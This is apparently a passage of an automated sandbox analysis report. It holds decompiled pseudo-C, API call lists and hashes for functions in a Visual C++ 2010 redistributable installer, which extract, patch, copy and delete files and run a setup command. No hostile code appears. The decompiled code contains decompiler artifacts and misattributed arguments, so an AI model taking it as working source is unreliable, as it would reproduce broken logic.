0x0100646b
0x0100646b
0x00000000
0x00000000
0x00000000
0x0100643c
0x01006434
0x01006425
0x0100646e
0x01006474
0x0100647b
0x01006482
0x01006489
0x0100648f
0x01006495
0x01006497
0x0100649d
0x010064a3
0x010064ac
0x010064b1
0x010064bd
0x010064c4
0x010064ca
0x010064cb
0x010064d0
0x010064d5
0x010064da
0x010064df
0x010064e4
0x01006503
0x01006506
0x0100650b
0x01006510
0x01006515
0x0100651e
0x01006520
0x01006523
0x01006526
0x01006529
0x01006531
0x01006533
0x0100653a
0x0100653d
0x0100653d
0x01006543
0x01006578
0x01006583

APIs

__set_app_type.MSVCRT ref: 01006474
__p__fmode.MSVCRT ref: 01006489
__p__commode.MSVCRT ref: 01006497
__setusermatherr.MSVCRT ref: 010064C4
_initterm.MSVCRT ref: 010064DA
__getmainargs.MSVCRT ref: 010064FD
_initterm.MSVCRT ref: 01006510
exit.MSVCRT ref: 0100653D
_cexit.MSVCRT ref: 01006543

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 1729372338-0
Opcode ID: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
Instruction ID: 599c4623493fcb82760b158fed09b41a5123095cb67496b16860643f61b92bca
Opcode Fuzzy Hash: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
Instruction Fuzzy Hash: 3B315874940205DFEB27DFA4D44CAEC77B2FB18312F10816AF196A62D8DB3B4A54CB21

Uniqueness

Uniqueness Score: -1.00%

Function 01002821 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01002821(void* __ecx) {
				long _v8;
				void* _t6;
				int _t9;

				_t6 =  *0x100c020; // 0xffffffff
				if(_t6 == 0xffffffff) {
					return _t6;
				}
				SetFilePointer(_t6, 0, 0, 0); // executed
				_t9 = ReadFile( *0x100c020, "Sdwn", 0x314,  &_v8, 0); // executed
				if(_t9 == 0 || _v8 != 0x314 ||  *0x100c8c0 != 0x6e776453) {
					 *0x100c8cb =  *0x100c8cb | 0x00000080;
				} else {
					if(( *0x100c8cb & 0x00000080) == 0) {
						 *0x100c8cb =  *0x100c8cb | 0x00000040;
						 *0x100cacf = 0;
						 *0x100cbd3 = 0;
						_t9 = _snprintf(0x100cd00, 0x103, 0x100cad0);
						if( *0x100c8c4 == 0x10000 && ( *0x100c8c8 & 0x3fffffec) == 0) {
							 *0x100c8cb =  *0x100c8cb & 0x000000bf;
						}
					}
				}
				return _t9;
			}

0x01002827
0x0100282f
0x010028d3
0x010028d3
0x0100283d
0x01002859
0x01002861
0x010028c9
0x01002874
0x0100287b
0x0100287d
0x01002893
0x01002899
0x0100289f
0x010028b2
0x010028c0
0x010028c0
0x010028b2
0x0100287b
0x00000000

APIs

SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000000), ref: 0100283D
ReadFile.KERNELBASE(Sdwn,00000314,?,00000000), ref: 01002859
_snprintf.MSVCRT ref: 0100289F

Strings

Sdwn, xrefs: 0100284E

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$PointerRead_snprintf
String ID: Sdwn
API String ID: 1063975976-2102837186
Opcode ID: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
Instruction ID: 9dcb7796340e3617a47c656186b8592bb183c83f9254e4a58000cb69e97ca3b5
Opcode Fuzzy Hash: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
Instruction Fuzzy Hash: F311A176501344ABF7338768AA8DB623BD8A706374F1403D9F5D1A20DAC37A4B84C379

Uniqueness

Uniqueness Score: -1.00%

Function 01003C87 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E01003C87(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* _a4, void* _a8, long _a12) {
				unsigned int _v0;
				PSID* _v4;
				signed int _v12;
				intOrPtr _v16;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				void* _v24;
				long _v28;
				void** _v32;
				void* _v36;
				void* __esi;
				int _t35;
				intOrPtr _t37;
				void* _t49;
				long _t59;
				long _t63;
				void* _t64;
				signed int _t71;
				signed int _t77;
				signed int _t85;
				intOrPtr _t90;
				unsigned int _t92;
				void* _t104;
				unsigned int _t111;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t119;
				void* _t120;

				_t91 = __edi;
				_t90 = __edx;
				_t65 = __ebx;
				if(_a4 != 0xdadafeed) {
					_t35 = WriteFile(_a4, _a8, _a12,  &_a12, 0); // executed
					if(_t35 != 0) {
						goto L4;
					} else {
						E01003892(0xffffffff);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t120 = _t119 - 0x18;
						_t37 =  *0x100c028; // 0xb636
						_t111 = _v0;
						_v16 = _t37;
						_v36 = _a4;
						_v24 = 0;
						_v23 = 0;
						_v22 = 0;
						_v21 = 0;
						_v20 = 0;
						_v19 = 5;
						if(AllocateAndInitializeSid( &_v24, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _v4) == 0 || OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24) == 0) {
							_t42 = 0;
						} else {
							_push(__ebx);
							_t42 = GetTokenInformation(_v24, 4, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0x10000,  &_v28); // executed
							if(_t42 != 0) {
								_push(__edi);
								_t92 = GetLengthSid( *0x100d3e0);
								_t49 = E01003BE7(_t92);
								 *_t111 = _t49;
								if(_t49 == 0) {
									L14:
									E01003892(8);
									goto L15;
								} else {
									_t114 =  *0x100d3e0; // 0x345c3a63
									_t77 = _t92 >> 2;
									memcpy(_t114 + _t77 + _t77, _t114, memcpy(_t49, _t114, _t77 << 2) & 0x00000003);
									_t120 = _t120 + 0x18;
									_t42 = GetTokenInformation(_v24, 1, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0x10000,  &_v28); // executed
									if(_t42 != 0) {
										_t111 = GetLengthSid( *0x100d3e0);
										_t49 = E01003BE7(_t111);
										 *_v32 = _t49;
										if(_t49 == 0) {
											goto L14;
										}
										L15:
										_t113 =  *0x100d3e0; // 0x345c3a63
										_t71 = _t111 >> 2;
										_t42 = memcpy(_t113 + _t71 + _t71, _t113, memcpy(_t49, _t113, _t71 << 2) & 0x00000003) + 1;
									}
								}
							}
							_pop(_t65);
						}
						_pop(_t112);
						return E010062FF(_t42, _t65, _v12, _t90, _t112);
					}
				} else {
					_t59 =  *0x100c050; // 0x0
					if(_a12 >= _t59) {
						_a12 = _t59;
					}
					_push(_t110);
					_t115 = _a8;
					_t104 =  *0x100d048; // 0x476a34
					_t85 = _a12 >> 2;
					memcpy(_t115 + _t85 + _t85, _t115, memcpy(_t104, _t115, _t85 << 2) & 0x00000003);
					_t63 = _a12;
					 *0x100c050 =  *0x100c050 - _t63;
					 *0x100d048 =  *0x100d048 + _t63;
					_t64 =  *0x100d048; // 0x476a34
					 *_t64 = 0;
					L4:
					return _a12;
				}
			}

0x01003c87
0x01003c87
0x01003c87
0x01003c93
0x01003ceb
0x01003cf3
0x00000000
0x01003cf5
0x01003cf7
0x01003cfc
0x01003cfd
0x01003cfe
0x01003cff
0x01003d00
0x01003d01
0x01003d07
0x01003d0a
0x01003d13
0x01003d16
0x01003d32
0x01003d35
0x01003d39
0x01003d3d
0x01003d41
0x01003d45
0x01003d49
0x01003d55
0x01003d6e
0x01003d75
0x01003d75
0x01003d8f
0x01003d93
0x01003d99
0x01003da6
0x01003da9
0x01003db1
0x01003db3
0x01003e04
0x01003e06
0x00000000
0x01003db5
0x01003db5
0x01003dc1
0x01003ddb
0x01003ddb
0x01003de0
0x01003de4
0x01003df2
0x01003df5
0x01003e00
0x01003e02
0x00000000
0x00000000
0x01003e0b
0x01003e0d
0x01003e17
0x01003e25
0x01003e25
0x01003de4
0x01003e26
0x01003e27
0x01003e27
0x01003e2b
0x01003e32
0x01003e32
0x01003c95
0x01003c95
0x01003c9d
0x01003c9f
0x01003c9f
0x01003ca5
0x01003ca6
0x01003cac
0x01003cb2
0x01003cbc
0x01003cbe
0x01003cc1
0x01003cc7
0x01003ccd
0x01003cd3
0x01003cd7
0x01003cdb
0x01003cdb

APIs

WriteFile.KERNELBASE(DADAFEED,?,?,?,00000000), ref: 01003CEB

Strings

4jG, xrefs: 01003CAC, 01003CC7, 01003CCD

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: FileWrite
String ID: 4jG
API String ID: 3934441357-2877932352
Opcode ID: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
Instruction ID: 8ed4801c38d92fe31a950a2119f22d7affeb1643a363de039ab70ebeba9e11e9
Opcode Fuzzy Hash: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
Instruction Fuzzy Hash: 60012C3120024DAFDB12CFADD800AEA77E9FB58320F448969FA68C7190D779D951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01003C0F Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01003C0F(CHAR* _a4) {
				void* _t2;
				void* _t5;

				_t2 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x8000000, 0); // executed
				_t5 = _t2;
				if(_t5 == 0xffffffff) {
					E01003892(_t2);
				}
				SetFilePointer(_t5,  *0x100c018, 0, 0); // executed
				return _t5;
			}

0x01003c2a
0x01003c30
0x01003c35
0x01003c38
0x01003c38
0x01003c48
0x01003c52

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,08000000,00000000), ref: 01003C2A
SetFilePointer.KERNELBASE(00000000,00000000,00000000), ref: 01003C48

Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
Part of subcall function 01003892: LoadStringA.USER32 ref: 010038ED
Part of subcall function 01003892: MessageBoxA.USER32 ref: 01003909
Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$CreateCriticalDeleteErrorExitLastLoadMessagePointerProcessSectionString
String ID:
API String ID: 1911058658-0
Opcode ID: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
Instruction ID: f747d1a96e7ed0c96837ae8def0cda9aa80c9c8a6c6ac268114b6baa7651c347
Opcode Fuzzy Hash: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
Instruction Fuzzy Hash: 8EE086313803247BF5332669AC0EF8579099701B71F204251FB58BA1C0C6A56A40C798

Uniqueness

Uniqueness Score: -1.00%

Function 01004590 Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01004590(signed int _a4, struct _SECURITY_ATTRIBUTES* _a8, intOrPtr _a12) {
				int _t12;
				CHAR* _t14;
				CHAR* _t15;

				_t14 = _a4;
				_t15 = _t14;
				_a4 = 0 | _a12 == 0x00000000;
				if( *_t14 != 0) {
					do {
						if( *_t15 == 0x5c) {
							 *_t15 = 0;
							_t12 = CreateDirectoryA(_t14, _a8); // executed
							if(_t12 != 0) {
								E0100447F(0x100c00c, _t14);
								_a4 = 1;
							}
							 *_t15 = 0x5c;
						}
						_t15 =  &(_t15[1]);
					} while ( *_t15 != 0);
				}
				return _a4;
			}

0x0100459f
0x010045a5
0x010045a7
0x010045aa
0x010045ac
0x010045af
0x010045b4
0x010045b8
0x010045c0
0x010045c8
0x010045cd
0x010045cd
0x010045d4
0x010045d4
0x010045d7
0x010045d8
0x010045ac
0x010045e3

APIs

CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
Instruction ID: 9cc6a4ee66b41767d7bcf1e787c71929ede8fd294d86324cd45e64105ddf3fa1
Opcode Fuzzy Hash: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
Instruction Fuzzy Hash: 7CF0B431500385AEFB334F29C804BAABFD89F91751F28809DFAC4CA582D7B58590C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 01003C58 Relevance: 1.5, APIs: 1, Instructions: 17
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01003C58(void* _a4, void* _a8, long _a12) {
				int _t7;

				_t7 = ReadFile(_a4, _a8, _a12,  &_a12, 0); // executed
				if(_t7 == 0) {
					E01003892(0xffffffff);
				}
				return _a12;
			}

0x01003c6c
0x01003c74
0x01003c78
0x01003c78
0x01003c81

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 01003C6C

Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
Part of subcall function 01003892: LoadStringA.USER32 ref: 010038ED
Part of subcall function 01003892: MessageBoxA.USER32 ref: 01003909
Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CriticalDeleteErrorExitFileLastLoadMessageProcessReadSectionString
String ID:
API String ID: 896096512-0
Opcode ID: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
Instruction ID: b5e608f67cd8aa0ec7224ba8d194bf05f248ddf814a44386e79e7048d07bb6a0
Opcode Fuzzy Hash: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
Instruction Fuzzy Hash: EED0173210034DBFDF129E95CC08EAA3B6DFF44220F084514BA7889090D732D520CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01002C7C Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01002C7C(void* _a4, long _a8, long _a12) {
				long _t5;
				long _t6;
				intOrPtr _t8;

				_t5 = _a8;
				if(_a12 == 0) {
					_t8 =  *0x100c018; // 0xa400
					_t5 = _t5 + _t8;
				}
				_t6 = SetFilePointer(_a4, _t5, 0, _a12); // executed
				return _t6 -  *0x100c018;
			}

0x01002c85
0x01002c88
0x01002c8a
0x01002c90
0x01002c90
0x01002c9b
0x01002ca8

APIs

SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 01002C9B

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
Instruction ID: 4670c305a0b7d71b77fc1b6fc64dcd010d39b6e931a86f05cad5b7c8d19ffb63
Opcode Fuzzy Hash: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
Instruction Fuzzy Hash: 8CD01731100208AFEB22CF48DD09FAA7BA9FB40314F058254F99C86195C776A9A4DB80

Uniqueness

Uniqueness Score: -1.00%

Function 01003BE7 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01003BE7(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x100d078, 8, _a4); // executed
				if(_t2 == 0) {
					E01003892(8);
					return _t2;
				}
				return _t2;
			}

0x01003bf7
0x01003bff
0x01003c03
0x00000000
0x01003c03
0x01003c09

APIs

RtlAllocateHeap.NTDLL(00000008,?), ref: 01003BF7

Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
Part of subcall function 01003892: LoadStringA.USER32 ref: 010038ED
Part of subcall function 01003892: MessageBoxA.USER32 ref: 01003909
Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: AllocateCriticalDeleteErrorExitHeapLastLoadMessageProcessSectionString
String ID:
API String ID: 2723237252-0
Opcode ID: d29ed06aef175119988cce3a01b5eac88403f80cc4c048d63e3ca06fa13aed40
Instruction ID: ad55088b63a8ad1721269f3b50eb0db26e9cccda6a3b5370c978a76dbeb461c3
Opcode Fuzzy Hash: d29ed06aef175119988cce3a01b5eac88403f80cc4c048d63e3ca06fa13aed40
Instruction Fuzzy Hash: E4C012311803087BFA631BAAAC09F553F59B790651F04C051F68C4C090DA62A4555750

Uniqueness

Uniqueness Score: -1.00%

Function 01003941 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01003941() {
				int _t1;

				_t1 = DialogBoxParamA( *0x100c05c, 0x64, 0, E01002E53, 0); // executed
				 *0x100ce04 =  *0x100ce04 & 0x00000000;
				if(_t1 != 0) {
					E01003892(0xffffffff);
					return _t1;
				}
				return _t1;
			}

0x01003952
0x01003958
0x01003961
0x01003965
0x00000000
0x01003965
0x0100396a

APIs

DialogBoxParamA.USER32 ref: 01003952

Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
Part of subcall function 01003892: LoadStringA.USER32 ref: 010038ED
Part of subcall function 01003892: MessageBoxA.USER32 ref: 01003909
Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CriticalDeleteDialogErrorExitLastLoadMessageParamProcessSectionString
String ID:
API String ID: 372479490-0
Opcode ID: 15e03c84a8a15e18858af6215931239894f471006d1615df1c756c50269ef313
Instruction ID: a510406ee53e3107ecf5958c8e1665ca229ba3e50066fc7eea34c27700789f19
Opcode Fuzzy Hash: 15e03c84a8a15e18858af6215931239894f471006d1615df1c756c50269ef313
Instruction Fuzzy Hash: 18D01231280340AAF6335724AE0AF5237A07720B2AF24839173E17C0D4C6EA4820CB68

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010046B9 Relevance: 70.6, APIs: 30, Strings: 10, Instructions: 611
filestringwindowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E010046B9(CHAR* __ecx, signed int __edx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v268;
				char _v528;
				char _v788;
				void* _v1788;
				struct _WIN32_FIND_DATAA _v2108;
				int _v2112;
				intOrPtr _v2116;
				signed int _v2120;
				intOrPtr _v2124;
				void* __ebx;
				void* __esi;
				intOrPtr _t143;
				void* _t145;
				signed int _t147;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t173;
				long _t174;
				signed int _t177;
				CHAR* _t180;
				signed int _t185;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t194;
				signed int _t195;
				signed int _t200;
				void* _t203;
				char* _t205;
				int _t207;
				intOrPtr* _t208;
				int _t210;
				int _t214;
				void* _t220;
				signed int _t221;
				signed int _t225;
				char* _t234;
				char* _t239;
				intOrPtr _t244;
				int _t255;
				CHAR* _t258;
				intOrPtr _t273;
				char* _t283;
				int _t292;
				CHAR* _t299;
				char _t314;
				CHAR* _t325;
				long _t327;
				signed int _t332;
				intOrPtr* _t334;
				signed int _t340;
				char _t346;
				char _t347;
				signed int _t352;
				signed int _t371;

				_t321 = __edx;
				_t307 = __ecx;
				_t143 =  *0x100c028; // 0xb636
				_v8 = _t143;
				_t144 = _a4;
				_t329 = "deltas";
				_v2124 = _a4;
				_v2120 = 1;
				_t145 = E010061D3(__ecx, _t144, "deltas");
				while(1) {
					_t324 = _t145;
					if(_t145 != 0) {
						_v2112 = 0;
						_t147 = E010060BE(_t324, 0,  &_v1788, 0x3e8);
						__eflags = _t147;
						if(_t147 != 0) {
							E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v268);
							_t153 = E010060BE(_t324, 1,  &_v1788, 0x3e8);
							__eflags = _t153;
							if(_t153 != 0) {
								E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v788);
								_t158 = E010060BE(_t324, 2,  &_v1788, 0x3e8);
								__eflags = _t158;
								if(_t158 == 0) {
									_v528 = 0;
								} else {
									E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v528);
								}
								_t160 = strstr( &_v268, "\\..\\");
								__eflags = _t160;
								_pop(_t307);
								if(_t160 == 0) {
									E01004590( &_v268, 0, 0);
									E0100447F(0x100c004,  &_v268);
									SetFileAttributesA( &_v268, 0x80);
									E0100360C(0, _t307, _t324, _v2124);
									_t307 =  &_v528;
									asm("sbb eax, eax");
									_t173 =  *0x100c040( &_v788,  ~_v528 &  &_v528,  &_v268, 0);
									__eflags = _t173;
									_v2112 = _t173;
									if(_t173 == 0) {
										_t174 = GetLastError();
										__eflags = _t174 - 5;
										if(_t174 == 5) {
											_t177 = E0100453F( &_v528,  &_v268, 0x100ce20, 0x100c3a0);
											__eflags = _t177;
											if(_t177 != 0) {
												__eflags =  *0x100c3a0; // 0x0
												_t307 = 0x100c3a0;
												if(__eflags == 0) {
													_t307 =  &_v268;
												}
												__eflags =  *0x100ce20; // 0x0
												if(__eflags == 0) {
													_t321 =  &_v528;
													asm("sbb eax, eax");
													_t180 =  ~_v528 &  &_v528;
													__eflags = _t180;
												} else {
													_t180 = 0x100ce20;
												}
												_v2112 =  *0x100c040( &_v788, _t180, _t307, 0);
												_t185 = E0100373C( &_v528,  &_v268, 0x100ce20, 0x100c3a0);
												__eflags = _t185;
												if(_t185 == 0) {
													_v2112 = 0;
												}
											}
										}
									}
								}
							}
						}
					} else {
						break;
					}
					_t38 =  &_v2120;
					 *_t38 = _v2120 & _v2112;
					__eflags =  *_t38;
					_t145 = E0100608F(0, _t324, _t324, _t329);
				}
				_t191 = E010061D3(_t307, _v2124, "copy");
				_v2116 = _t191;
				_t325 = 0x100ce20;
				if(_t191 == 0) {
					L39:
					_t192 = E010061D3(_t307, _v2124, "verify");
					_v2116 = _t192;
					if(_t192 == 0) {
						L63:
						E0100370B();
						_t326 = "delete";
						_t194 = E010061D3(_t307, _v2124, "delete");
						while(1) {
							_v2116 = _t194;
							if(_t194 == 0) {
								break;
							}
							_t307 =  &_v1788;
							_t195 = E010060BE(_t194, 1,  &_v1788, 0x3e8);
							__eflags = _t195;
							if(_t195 == 0) {
								L78:
								_t194 = E0100608F(0, _t326, _v2116, _t326);
								continue;
							}
							E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v268);
							_t200 = strstr( &_v268, "\\..\\");
							__eflags = _t200;
							_pop(_t307);
							if(_t200 != 0) {
								goto L78;
							}
							_t203 = FindFirstFileA( &_v268,  &_v2108);
							__eflags = _t203 - 0xffffffff;
							_v2112 = _t203;
							if(_t203 == 0xffffffff) {
								goto L78;
							}
							_t205 = strrchr( &_v268, 0x5c);
							_pop(_t307);
							_t332 =  &(_t205[1]);
							__eflags = _t332;
							do {
								__eflags = _v2108.dwFileAttributes & 0x00000010;
								if((_v2108.dwFileAttributes & 0x00000010) != 0) {
									goto L76;
								}
								__eflags =  *0x100c4b4; // 0x1
								if(__eflags == 0) {
									SendDlgItemMessageA( *0x100ce04, 0x68, 0xc, 0,  &(_v2108.cFileName));
								}
								_t208 =  &(_v2108.cFileName);
								_t321 = _t332 - _t208;
								__eflags = _t321;
								do {
									_t307 =  *_t208;
									 *(_t321 + _t208) = _t307;
									_t208 = _t208 + 1;
									__eflags = _t307;
								} while (_t307 != 0);
								_t210 = DeleteFileA( &_v268);
								__eflags = _t210;
								if(_t210 == 0) {
									Sleep(0x1f4);
									SetFileAttributesA( &_v268, 0x80);
									_t214 = DeleteFileA( &_v268);
									__eflags = _t214;
									if(_t214 == 0) {
										E0100447F(0x100c004,  &_v268);
									}
								}
								L76:
								_t207 = FindNextFileA(_v2112,  &_v2108);
								__eflags = _t207;
							} while (_t207 != 0);
							FindClose(_v2112);
							goto L78;
						}
						_t330 = "options";
						_t220 = E010061F9(_t307, _t321, _t326, _v2124, "options", "command");
						_t327 = L"";
						if(_t220 == 0) {
							L87:
							_t221 = E010061F9(_t307, _t321, _t327, _v2124, _t330, "run");
							__eflags = _t221;
							if(_t221 != 0) {
								_t225 = E010060BE(_t221, 1,  &_v1788, 0x3e8);
								__eflags = _t225;
								if(_t225 != 0) {
									 *0x100ce0c = E01003E3A( &_v1788);
									E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v268);
									 *0x100d07c = E01003E3A( &_v268);
									_t234 = strrchr( &_v268, 0x5c);
									__eflags = _t234;
									if(_t234 != 0) {
										 *_t234 = 0;
									}
									 *0x101d3e4 = E01003E3A( &_v268);
								}
							}
							L92:
							_t371 =  *0x100c4b4; // 0x1
							if(_t371 == 0) {
								SendDlgItemMessageA( *0x100ce04, 0x68, 0xc, 0, _t327);
							}
							return E010062FF(_v2120, 0, _v8, _t321, _t330);
						}
						_t307 =  &_v1788;
